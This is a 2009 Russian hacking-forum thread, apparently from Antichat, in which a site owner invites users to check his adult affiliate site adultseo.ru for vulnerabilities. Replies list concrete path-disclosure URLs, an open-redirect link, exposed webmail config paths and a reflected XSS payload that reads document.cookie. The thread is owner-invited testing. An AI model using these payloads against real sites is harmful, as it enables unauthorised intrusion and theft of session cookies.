Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   adultseo.ru (https://forum.antichat.xyz/showthread.php?t=103756)

Doom123 30.01.2009 02:46
adultseo.ru
 
adultseo.ru Проверьте плиз сайт на уязвимости ...
партнёрк писал с 0 .... платник для неё

sexmalishki.ru

+5 тому кто хоть чтото найдёт =)

login999 30.01.2009 10:12
зарегестрируйтесь - очипятка, должно быть "зарегистрируйтесь" :)
плюс в форме ввода немного уменьши длину поля для пароля, ато получается что Password на одной строчке, а : на другой :)
Переныкай админку, ато http://adultseo.ru/admin/ это как-то банально :)

Shadow_p1raT 30.01.2009 10:19
Раскрытие путей
Код:
http://adultseo.ru/index.php?p[]=1
Код:
http://adultseo.ru/index.php?act=stat&site[]=

login999 30.01.2009 10:23
http://adultseo.ru/redir.php?text=%5C%5C'%D0%E5%E3%E8%F1%F2%F0%E0%F6% E8%FF+%EE%EA%EE%ED%F7%E5%ED%E0%21&to=index.php
При переходе видно, что включено экранирование кавычек слешами :) Кто шарит, может расковыряет :)
P.S. Для тех, кому лень регистрироваться логин: antichat, пароль antichat :)

[NiGHT]DarkAngel 30.01.2009 11:45
http://adultseo.ru/index.php?act=stat&country[]=
http://adultseo.ru/redir.php?text=%C2%FB+%E2%EE%F8%EB%E8+%E2+%F1%E8%F 1%F2%E5%EC%F3%21&to[]=
- раскрытие путей

http://adultseo.ru/redir.php?text=%DF%20%E2%E7%EB%EE%EC%E0%EB%20%FD%F 2%EE%F2%20%F1%E0%E9%F2%20:-D&to[]=

Только что бы побаловаться :D

-Hormold- 30.01.2009 13:39
http://adultseo.ru/redir.php?text[]=%5C%5C%27%D0%E5%E3%E8%F1%F2%F0%E0%F6%%20E8%FF+%EE %EA%EE%ED%F7%E5%ED%E0%21&to=index.php

-Hormold- 30.01.2009 13:48
ошибка на странице ссылки
там где реф ссылка у тебе ?act=reg
а должно быть ?page

Doom123 30.01.2009 14:00
login999 ммм а что там ковырять? .... нах те кавычка если там нет обращения к БД? а xss не выйдет т.к стоит htmlspecialchars

зы всем спасибо исправил .. а посерьёзней ничего нет?

login999 30.01.2009 17:03
Цитата:
Сообщение от Doom123
login999 ммм а что там ковырять? .... нах те кавычка если там нет обращения к БД? а xss не выйдет т.к стоит htmlspecialchars

зы всем спасибо исправил .. а посерьёзней ничего нет?
Кавычку сую тупо по привычке везде :)
А вот насчет той ссылочки, то смотри на вот такой прикол :
http://adultseo.ru/redir.php?text=%C0%20%F2%E5%EF%E5%F0%FC%20%EC%FB%2 0%E2%E0%F1%20%EE%F2%EF%F0%E0%E2%E8%EC%20%ED%E0%20% E8%F4%F0%E5%E9%EC,%20%E0%20%EC%EE%E6%E5%F2%20%E8%2 0%ED%E0%20%F4%E5%E9%EA,%20%FF%20%F2%EE%F7%ED%EE%20 %F5%E7;)&to=http://forum.devisible.ru

а потом подумай хорошенько :)

Maestus 30.01.2009 19:55
Пассивная ХСС
Цитата:
http://adultseo.ru/webmail/index.php?lid=bg&f_email=%22%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E
открыты директории..
webmail/inc/
webmail/docs/

раскрытие путей
http://adultseo.ru/webmail/inc/inc.php
http://adultseo.ru/webmail/inc/class.uebimiau.php
http://adultseo.ru/webmail/inc/class.uebimiau_mail.php
http://adultseo.ru/webmail/inc/config.php


Время: 05:26
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице